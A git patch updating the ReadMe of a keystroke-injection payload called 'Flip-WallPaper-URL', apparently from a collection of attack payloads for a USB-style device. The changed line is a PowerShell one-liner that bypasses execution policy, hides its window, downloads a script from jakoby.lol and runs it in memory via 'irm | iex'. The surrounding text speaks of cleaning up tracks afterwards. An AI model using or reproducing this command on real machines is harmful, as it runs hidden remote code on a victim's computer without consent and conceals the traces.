From ed6a0e837ce58f278c0ea5bd10fd8f74cb312fe4 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 6 Jan 2023 22:33:15 -0600 Subject: [PATCH] Update ReadMe.md --- Payloads/Flip-WallPaper-URL/ReadMe.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-WallPaper-URL/ReadMe.md b/Payloads/Flip-WallPaper-URL/ReadMe.md index 833034f..34a4c96 100644 --- a/Payloads/Flip-WallPaper-URL/ReadMe.md +++ b/Payloads/Flip-WallPaper-URL/ReadMe.md @@ -38,7 +38,7 @@ Lastly, to clean up your tracks behind you, the tmp folder will be emptied and t * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory * Place your images URL in the $url variable ``` -powershell -noexit -NoP -NonI -Exec Bypass $url='URL-HERE';irm jakoby.lol/pkw | iex +powershell -w h -NoP -NonI -Exec Bypass $url='URL-HERE';irm jakoby.lol/pkw | iex ```

(back to top)